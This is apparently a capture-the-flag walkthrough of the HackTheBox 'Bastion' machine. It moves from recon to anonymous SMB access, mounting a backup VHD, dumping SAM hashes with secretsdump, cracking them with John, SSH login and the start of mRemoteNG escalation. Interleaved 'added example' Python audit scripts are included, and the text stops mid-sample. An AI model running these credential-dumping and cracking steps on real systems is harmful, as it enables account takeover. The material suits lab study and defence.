Bastion [EASY🟢]
Difficulty: Easy
1- Reconnaissance and scanning
1.1 Ping

❯ ping -c 1 10.10.10.134
PING 10.10.10.134 (10.10.10.134) 56(84) bytes of data.
64 bytes from 10.10.10.134: icmp_seq=1 ttl=127 time=173 ms

--- 10.10.10.134 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 173.374/173.374/173.374/0.000 ms

The TTL of 127 tells us this is a Windows machine, going by the usual reference values:
TTL <= 64 >> (Linux)
TTL <= 128 >> (Windows)

1.2 Nmap

❯ nmap -sS -sCV -p- -open --min-rate 5000 -Pn -vvv -oN escaneo.txt 10.10.10.134

File: escaneo.txt
# Nmap 7.95 scan initiated Sat Mar  8 15:21:26 2025 as: /usr/lib/nmap/nmap --privileged -sS -sCV -p- -open --min-rate 5000 -Pn -vvv -oN escaneo.txt 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up, received user-set (0.18s latency).
Scanned at 2025-03-08 15:21:27 -03 for 87s
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE      REASON          VERSION
22/tcp    open  ssh          syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
|   256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-03-08T18:22:45
|_  start_date: 2025-03-08T18:19:47
|_clock-skew: mean: -19m59s, deviation: 34m36s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 26941/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 11143/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 18741/udp): CLEAN (Timeout)
|   Check 4 (port 20058/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-03-08T19:22:44+01:00

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar  8 15:22:54 2025 -- 1 IP address (1 host up) scanned in 88.87 seconds

We are looking at a Windows Server environment: port 22 is an SSH server, 135 and 139 are the usual Windows RPC/NetBIOS ports, 445 serves file shares over SMB, and 5985 is WinRM, which we may later use to connect with evil-winrm.
1.3 crackmapexec

❯ crackmapexec smb 10.10.10.134
SMB         10.10.10.134    445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)

Windows Server 2016 Standard build 14393 x64 (64-bit), computer name "BASTION" and domain "Bastion"; SMB signing is not enforced (signing:False) and SMBv1 is enabled.
1.4 smbclient (list shares)

❯ smbclient -L 10.10.10.134 -N
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Besides the default shares of an SMB service (ADMIN$, C$ and IPC$), there is a share that appears to hold the machine's backups, "Backups".
1.5 smbmap (null-session permissions on the shares)

❯ smbmap -H 10.10.10.134 -u 'null'
    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 0 authenticated session(s)                                                          
[!] Unable to remove test file at \\10.10.10.134\Backups\INORFGVYQT.txt, please remove manually                              
                                                                                                                             
[+] IP: 10.10.10.134:445	Name: 10.10.10.134        	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	Backups                                           	READ, WRITE	
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
[*] Closed 1 connections

We have read and write permission on the "Backups" share. (smbmap proved the write access by dropping a test file, which it then failed to remove; see the [!] line above.)
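As an added example (not part of the original write-up), the following Python script turns the recon output of sections 1.3 and 1.5 into audit findings: it parses the crackmapexec banner line and the smbmap permissions table, and flags SMBv1, non-enforced signing and every share an unauthenticated (null) session can reach, ranking write access highest. The sample lines are constructed from the output shown above; the function names are my own.

```python
"""Turn SMB recon output into defender-facing findings (added example)."""
import re

# Constructed sample: the crackmapexec line from section 1.3.
CME_LINE = ("SMB         10.10.10.134    445    BASTION          [*] Windows Server 2016 "
            "Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)")

# Constructed sample: the tab-separated permissions table from the smbmap null-session run in 1.5.
SMBMAP_TABLE = """\
\tDisk                                                  \tPermissions\tComment
\t----                                                  \t-----------\t-------
\tADMIN$                                            \tNO ACCESS\tRemote Admin
\tBackups                                           \tREAD, WRITE\t
\tC$                                                \tNO ACCESS\tDefault share
\tIPC$                                              \tREAD ONLY\tRemote IPC
"""


def parse_cme(line):
    """Return the key:value flags crackmapexec prints in parentheses, e.g. {'SMBv1': 'True'}."""
    return {k: v for k, v in re.findall(r"\((\w+):([^)]*)\)", line)}


def parse_smbmap(table):
    """Return (share, permissions) pairs from smbmap's table, skipping header rows."""
    shares = []
    for row in table.splitlines():
        cols = [c.strip() for c in row.split("\t") if c.strip() != ""]
        if len(cols) < 2 or cols[0] in ("Disk", "----"):
            continue
        shares.append((cols[0], cols[1]))
    return shares


def null_session_findings(shares):
    """Rank shares a null session can reach; read on IPC$ is expected on Windows."""
    findings = []
    for name, perms in shares:
        if perms == "NO ACCESS" or name == "IPC$":
            continue
        severity = "HIGH" if "WRITE" in perms else "MEDIUM"
        findings.append((severity, f"null session has {perms} on {name}"))
    return findings


def smb_findings(cme_line, smbmap_table):
    """Combine protocol-level and share-level findings into one list."""
    flags = parse_cme(cme_line)
    findings = []
    if flags.get("SMBv1") == "True":
        findings.append(("MEDIUM", "SMBv1 is enabled"))
    if flags.get("signing") == "False":
        findings.append(("MEDIUM", "SMB signing is not required"))
    findings.extend(null_session_findings(parse_smbmap(smbmap_table)))
    return findings


if __name__ == "__main__":
    for severity, text in smb_findings(CME_LINE, SMBMAP_TABLE):
        print(f"[{severity}] {text}")
```

Run as-is it reports the three findings visible above (SMBv1, signing, and anonymous READ/WRITE on Backups); point `parse_smbmap` at the saved output of a real smbmap run to audit other hosts the same way.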
2- Exploitation
2.1 Backups share over SMB and QEMU NBD

Let's connect to the "Backups" share over SMB using "smbclient":

❯ smbclient //10.10.10.134/Backups
Password for [WORKGROUP\t0mz]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Apr 16 07:02:11 2019
  ..                                  D        0  Tue Apr 16 07:02:11 2019
  note.txt                           AR      116  Tue Apr 16 07:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 09:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 09:44:02 2019
		5638911 blocks of size 4096. 1179967 blocks available
Let's go into "WindowsImageBackup":
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> dir
  .                                  Dn        0  Fri Feb 22 09:44:02 2019
  ..                                 Dn        0  Fri Feb 22 09:44:02 2019
  L4mpje-PC                          Dn        0  Fri Feb 22 09:45:32 2019
		5638911 blocks of size 4096. 1179708 blocks available
Then into "L4mpje-PC":
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> dir
  .                                  Dn        0  Fri Feb 22 09:45:32 2019
  ..                                 Dn        0  Fri Feb 22 09:45:32 2019
  Backup 2019-02-22 124351           Dn        0  Fri Feb 22 09:45:32 2019
  Catalog                            Dn        0  Fri Feb 22 09:45:32 2019
  MediaId                            An       16  Fri Feb 22 09:44:02 2019
  SPPMetadataCache                   Dn        0  Fri Feb 22 09:45:32 2019
		5638911 blocks of size 4096. 1179711 blocks available
And into "Backup 2019-02-22 124351":
smb: \WindowsImageBackup\L4mpje-PC\> cd Backup 2019-02-22 124351\
cd \WindowsImageBackup\L4mpje-PC\Backup\: NT_STATUS_OBJECT_NAME_NOT_FOUND

It does not let us in (the unquoted spaces cut the path off at "\Backup\"), so to reach the backup from that date we will instead mount the share on Kali, under "/mnt", as a CIFS mount:
❯ sudo mkdir /mnt/smb
❯ sudo mount -t cifs //10.10.10.134/Backups /mnt/smb
Password for root@//10.10.10.134/Backups:

Now move into the "smb" directory where the share is mounted:
❯ cd /mnt/smb
❯ ls
 WindowsImageBackup   note.txt   SDT65CB.tmp

Now run "tree" to see the whole structure of the share:
❯ tree
.
├── SDT65CB.tmp
├── WindowsImageBackup
│   └── L4mpje-PC
│       ├── Backup 2019-02-22 124351
│       │   ├── 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
│       │   ├── 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
│       │   ├── BackupSpecs.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
│       │   └── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
│       ├── Catalog
│       │   ├── BackupGlobalCatalog
│       │   └── GlobalCatalog
│       ├── MediaId
│       └── SPPMetadataCache
│           └── {cd113385-65ff-4ea2-8ced-5630f6feca8f}
└── note.txt
6 directories, 19 files

There are two ".vhd" files, i.e. virtual disks (VHD = Virtual Hard Disk):
❯ ls -la /mnt/smb/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351
drwxr-xr-x root root   0 B  Fri Feb 22 09:45:32 2019  .
drwxr-xr-x root root   0 B  Fri Feb 22 09:45:32 2019  ..
.rwxr-xr-x root root  36 MB Fri Feb 22 09:44:03 2019  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
.rwxr-xr-x root root 5.0 GB Fri Feb 22 09:45:32 2019  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
.rwxr-xr-x root root 1.2 KB Fri Feb 22 09:45:32 2019  BackupSpecs.xml
.rwxr-xr-x root root 1.1 KB Fri Feb 22 09:45:32 2019  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
.rwxr-xr-x root root 8.7 KB Fri Feb 22 09:45:32 2019  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
.rwxr-xr-x root root 6.4 KB Fri Feb 22 09:45:32 2019  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
.rwxr-xr-x root root 2.8 KB Fri Feb 22 09:45:32 2019  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
.rwxr-xr-x root root 1.5 KB Fri Feb 22 09:45:32 2019  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
.rwxr-xr-x root root 1.4 KB Fri Feb 22 09:45:32 2019  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
.rwxr-xr-x root root 3.8 KB Fri Feb 22 09:45:32 2019  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
.rwxr-xr-x root root 3.9 KB Fri Feb 22 09:45:32 2019  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
.rwxr-xr-x root root 6.9 KB Fri Feb 22 09:45:32 2019  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
.rwxr-xr-x root root 2.3 MB Fri Feb 22 09:45:32 2019  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml

One of them, the second, is 5 GB.
To look inside this virtual disk we will use a tool called "qemu-nbd" to perform another mount, this time of the virtual disk itself.
Create a directory under "/mnt" called "vhd":

❯ mkdir /mnt/vhd

(To use "qemu-nbd" the QEMU utilities must be installed: "apt install qemu-utils".)
Before mounting the VHD, load the "nbd" kernel module with "modprobe":

❯ modprobe nbd

Now "qemu-nbd" can expose the virtual disk through the NBD protocol. If we list /dev:
❯ ls /dev
 block       pts               fb0            nbd0    nbd6     rtc        stdout   tty18   tty29   tty4    tty50   tty61    urandom       vcsa2   vcsu6
 bsg         shm               full           nbd1    nbd7     rtc0       tty      tty19   tty3    tty40   tty51   tty62    userfaultfd   vcsa3   vcsu7
 bus         snd               fuse           nbd10   nbd8     sda        tty0     tty2    tty30   tty41   tty52   tty63    vcs           vcsa4   vga_arbiter
 char        vfio              hidraw0        nbd11   nbd9     sda1       tty1     tty20   tty31   tty42   tty53   tty7     vcs1          vcsa5   vhci
 disk        autofs            hpet           nbd12   null     sda2       tty10    tty21   tty32   tty43   tty54   tty8     vcs2          vcsa6   vhost-net
 dri         btrfs-control     hwrng          nbd13   nvram    sda5       tty11    tty22   tty33   tty44   tty55   tty9     vcs3          vcsa7   vhost-vsock
 fd          cdrom             initctl        nbd14   port     sg0        tty12    tty23   tty34   tty45   tty56   ttyS0    vcs4          vcsu    vmci
 hugepages   console           kmsg           nbd15   ppp      sg1        tty13    tty24   tty35   tty46   tty57   ttyS1    vcs5          vcsu1   vsock
 input       core              log            nbd2    psaux    snapshot   tty14    tty25   tty36   tty47   tty58   ttyS2    vcs6          vcsu2   zero
 mapper      cpu_dma_latency   loop-control   nbd3    ptmx     sr0        tty15    tty26   tty37   tty48   tty59   ttyS3    vcs7          vcsu3  
 mqueue      cuse              mem            nbd4    random   stderr     tty16    tty27   tty38   tty49   tty6    uhid     vcsa          vcsu4  
 net         dmmidi            midi           nbd5    rfkill   stdin      tty17    tty28   tty39   tty5    tty60   uinput   vcsa1         vcsu5

Several "nbd" device nodes appear; they belong to the NBD driver and are the slots to which the virtual disk can be attached. I will use "nbd0":
❯ qemu-nbd -r -c /dev/nbd0 "/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"

The virtual disk is now attached read-only (-r), and its first partition shows up as "/dev/nbd0p1".
All that remains is to mount that partition on "/mnt/vhd":
❯ cd /mnt/vhd
❯ mount /dev/nbd0p1 /mnt/vhd
❯ ls -la
drwxrwxrwx root root   0 B  Fri Feb 22 09:39:26 2019  '$Recycle.Bin'
drwxrwxrwx root root  12 KB Fri Feb 22 09:39:17 2019  .
drwxr-xr-x root root 4.0 KB Sun Mar  9 05:37:44 2025  ..
lrwxrwxrwx root root  31 B  Tue Jul 14 01:53:55 2009  'Documents and Settings' ⇒ /mnt/virtual_hard_bastion/Users
drwxrwxrwx root root   0 B  Mon Jul 13 23:37:05 2009  PerfLogs
drwxrwxrwx root root 4.0 KB Mon Apr 11 23:21:18 2011  'Program Files'
drwxrwxrwx root root 4.0 KB Tue Jul 14 01:53:55 2009  ProgramData
drwxrwxrwx root root   0 B  Fri Feb 22 09:39:17 2019  Recovery
drwxrwxrwx root root 4.0 KB Fri Feb 22 09:43:53 2019  'System Volume Information'
drwxrwxrwx root root 4.0 KB Fri Feb 22 09:39:21 2019  Users
drwxrwxrwx root root  16 KB Fri Feb 22 09:40:48 2019  Windows
.rwxrwxrwx root root  24 B  Wed Jun 10 18:42:20 2009  autoexec.bat
.rwxrwxrwx root root  10 B  Wed Jun 10 18:42:20 2009  config.sys
.rwxrwxrwx root root 2.0 GB Fri Feb 22 09:38:21 2019  pagefile.sys

This is the backup's filesystem.
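Before attaching an unknown image to /dev/nbd0 it is worth reading its VHD footer. Added example (my code, not from the write-up): the last 512 bytes of every VHD file hold a big-endian footer with the "conectix" cookie, the virtual size, the disk type (fixed, dynamic or differencing) and a checksum, so an image can be identified and sanity-checked without mounting anything. The footer here is constructed to describe a 5 GiB dynamic disk like the second .vhd above; every id, timestamp and helper name is an assumption of this example.

```python
"""Identify and checksum a VHD image from its footer (added example)."""
import struct
import uuid

# Footer layout (VHD spec, big-endian): 85 bytes of fields followed by 427 reserved bytes.
FOOTER_FMT = ">8sIIQI4sI4sQQHBBII16sB"
FOOTER_LEN = 512
CHECKSUM_OFFSET = 64
DISK_TYPES = {2: "fixed", 3: "dynamic", 4: "differencing"}


def vhd_checksum(footer):
    """One's complement of the byte sum of the footer with the checksum field zeroed."""
    zeroed = footer[:CHECKSUM_OFFSET] + b"\x00" * 4 + footer[CHECKSUM_OFFSET + 4:]
    return (~sum(zeroed)) & 0xFFFFFFFF


def parse_vhd_footer(image):
    """Parse the trailing 512 bytes of a VHD image (bytes) into a summary dict."""
    footer = image[-FOOTER_LEN:]
    if len(footer) != FOOTER_LEN:
        raise ValueError("image is shorter than a VHD footer")
    f = struct.unpack(FOOTER_FMT, footer[:struct.calcsize(FOOTER_FMT)])
    if f[0] != b"conectix":
        raise ValueError("missing 'conectix' cookie: not a VHD footer")
    return {
        "creator": f[5].decode("ascii", "replace").strip("\x00"),
        "data_offset": f[3],            # 0xFFFFFFFFFFFFFFFF for fixed disks
        "virtual_size": f[9],           # current size of the virtual disk in bytes
        "disk_type": DISK_TYPES.get(f[13], f"unknown({f[13]})"),
        "uuid": str(uuid.UUID(bytes=f[15])),
        "checksum_ok": f[14] == vhd_checksum(footer),
    }


def inspect_file(path):
    """Read only the footer of a real .vhd on disk (no mount, no qemu-nbd needed)."""
    with open(path, "rb") as fh:
        fh.seek(-FOOTER_LEN, 2)
        return parse_vhd_footer(fh.read())


def build_footer(virtual_size, disk_type, creator=b"qemu", data_offset=512):
    """Construct a footer with a valid checksum; used here only to make sample data."""
    fields = [b"conectix", 2, 0x00010000, data_offset, 0, creator, 0x00010000, b"Wi2k",
              virtual_size, virtual_size, 0, 0, 0, disk_type, 0,
              uuid.UUID(int=0x1234).bytes, 0]
    body = struct.pack(FOOTER_FMT, *fields) + b"\x00" * 427
    fields[14] = vhd_checksum(body)
    return struct.pack(FOOTER_FMT, *fields) + b"\x00" * 427


# Constructed sample "image": some padding plus a footer describing a 5 GiB dynamic disk.
SAMPLE_DYNAMIC_VHD = b"\x00" * 1024 + build_footer(5 * 1024 ** 3, 3)


def tamper(image):
    """Flip one bit in the size field so the stored checksum no longer matches."""
    data = bytearray(image)
    data[-FOOTER_LEN + 48] ^= 0x01
    return bytes(data)


if __name__ == "__main__":
    info = parse_vhd_footer(SAMPLE_DYNAMIC_VHD)
    print(f"{info['disk_type']} VHD, {info['virtual_size'] / 1024 ** 3:.1f} GiB virtual, "
          f"creator '{info['creator']}', checksum {'OK' if info['checksum_ok'] else 'BAD'}")
    print("tampered copy checksum_ok:", parse_vhd_footer(tamper(SAMPLE_DYNAMIC_VHD))["checksum_ok"])
```

`inspect_file` only seeks to the last 512 bytes, so it is cheap even on the 5 GB image over the CIFS mount; a failed checksum or a missing cookie means the file is not a well-formed VHD and should not be handed to qemu-nbd as one.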
2.2 SAM and SYSTEM

Let's go to the following path to get the machine's SAM hashes:
❯ cd Windows/System32/config
❯ ls -l | grep 'SAM'
.rwxrwxrwx root root 256 KB Fri Feb 22 09:39:21 2019 SAM
.rwxrwxrwx root root 1.0 KB Mon Apr 11 23:23:51 2011 SAM.LOG
.rwxrwxrwx root root  21 KB Fri Feb 22 09:39:21 2019 SAM.LOG1
.rwxrwxrwx root root   0 B  Mon Jul 13 23:03:40 2009 SAM.LOG2
❯ ls -l | grep 'SYSTEM'
.rwxrwxrwx root root 9.3 MB Fri Feb 22 09:43:54 2019 SYSTEM
.rwxrwxrwx root root 1.0 KB Mon Apr 11 23:23:51 2011 SYSTEM.LOG
.rwxrwxrwx root root 256 KB Fri Feb 22 09:43:54 2019 SYSTEM.LOG1
.rwxrwxrwx root root   0 B  Mon Jul 13 23:03:40 2009 SYSTEM.LOG2

Now use "impacket-secretsdump" to extract the hashes from these two hives:
❯ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...

Save the hashes to a text file:
❯ nvim hashes_sam
❯ cat hashes_sam
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

2.3 Getting a shell over SSH

Now let's use "John The Ripper" to crack these hashes:
(In my case I'll use the "rockyou" wordlist.)

❯ john --wordlist=/usr/share/wordlists/rockyou.txt hashes_sam --format=NT
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)     
bureaulampje     (L4mpje)     
2g 0:00:00:00 DONE (2025-03-09 05:46) 3.333g/s 15659Kp/s 15659Kc/s 15667KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.

User: L4mpje
Password: bureaulampje
Now that we have a username and password, we connect over SSH:

❯ ssh L4mpje@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>
2.4 Getting the user flag
The user flag is at the absolute path "C:\Users\L4mpje\Desktop\user.txt":
l4mpje@BASTION C:\Users\L4mpje\Desktop>type "C:\Users\L4mpje\Desktop\user.txt"                                                  
a0ec39679d666dd98a7a9c6a77cb064d                                                                                                
l4mpje@BASTION C:\Users\L4mpje\Desktop>

3- Privilege escalation
3.1 mRemoteNG

Let's go to "Program Files (x86)":
l4mpje@BASTION C:\Users\L4mpje\Desktop>cd ..                                                                                    
l4mpje@BASTION C:\Users\L4mpje>cd ..                                                                                            
l4mpje@BASTION C:\Users>cd ..                                                                                                   
l4mpje@BASTION C:\>dir                                                                                                          
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 1B7D-E692                                                                                              
 Directory of C:\                                                                                                               
16-04-2019  11:02    <DIR>          Backups                                                                                     
12-09-2016  12:35    <DIR>          Logs                                                                                        
22-02-2019  14:42    <DIR>          PerfLogs                                                                                    
31-01-2022  17:39    <DIR>          Program Files                                                                               
22-02-2019  14:01    <DIR>          Program Files (x86)                                                                         
22-02-2019  13:50    <DIR>          Users                                                                                       
31-01-2022  17:52    <DIR>          Windows                                                                                     
               0 File(s)              0 bytes                                                                                   
               7 Dir(s)   4.824.477.696 bytes free                                                                              
l4mpje@BASTION C:\>cd Program Files (x86)                                                                                       
l4mpje@BASTION C:\Program Files (x86)>dir                                                                                       
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 1B7D-E692                                                                                              
 Directory of C:\Program Files (x86)                                                                                            
22-02-2019  14:01    <DIR>          .                                                                                           
22-02-2019  14:01    <DIR>          ..                                                                                          
16-07-2016  14:23    <DIR>          Common Files                                                                                
23-02-2019  09:38    <DIR>          Internet Explorer                                                                           
16-07-2016  14:23    <DIR>          Microsoft.NET                                                                               
22-02-2019  14:01    <DIR>          mRemoteNG                                                                                   
23-02-2019  10:22    <DIR>          Windows Defender                                                                            
23-02-2019  09:38    <DIR>          Windows Mail                                                                                
23-02-2019  10:22    <DIR>          Windows Media Player                                                                        
16-07-2016  14:23    <DIR>          Windows Multimedia Platform                                                                 
16-07-2016  14:23    <DIR>          Windows NT                                                                                  
23-02-2019  10:22    <DIR>          Windows Photo Viewer                                                                        
16-07-2016  14:23    <DIR>          Windows Portable Devices                                                                    
16-07-2016  14:23    <DIR>          WindowsPowerShell                                                                           
               0 File(s)              0 bytes                                                                                   
              14 Dir(s)   4.824.477.696 bytes free                                                                              
l4mpje@BASTION C:\Program Files (x86)>

"mRemoteNG" is installed, a remote desktop connection manager. If the user saved connection passwords in it so as not to type them every time, those passwords are kept in mRemoteNG's own files. They are stored in protected (encrypted) form, but that encryption can be broken.
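Added example (my code, neither mRemoteNG's nor the author's): an inventory script for the connections file mRemoteNG keeps in the user profile (confCons.xml, shown further down in this section). It reads the encryption settings from the root element and lists every connection node that carries a stored password, without decrypting anything, which is what you want when checking which profiles across a fleet hold saved credentials. The XML is a constructed sample that mirrors the attributes seen in this section; its Password and Protected values are placeholders, and the second node is invented to show container nesting.

```python
"""Inventory stored credentials in an mRemoteNG confCons.xml (added example)."""
import sys
import xml.etree.ElementTree as ET

# Constructed sample; attribute names follow the real file, values are placeholders.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
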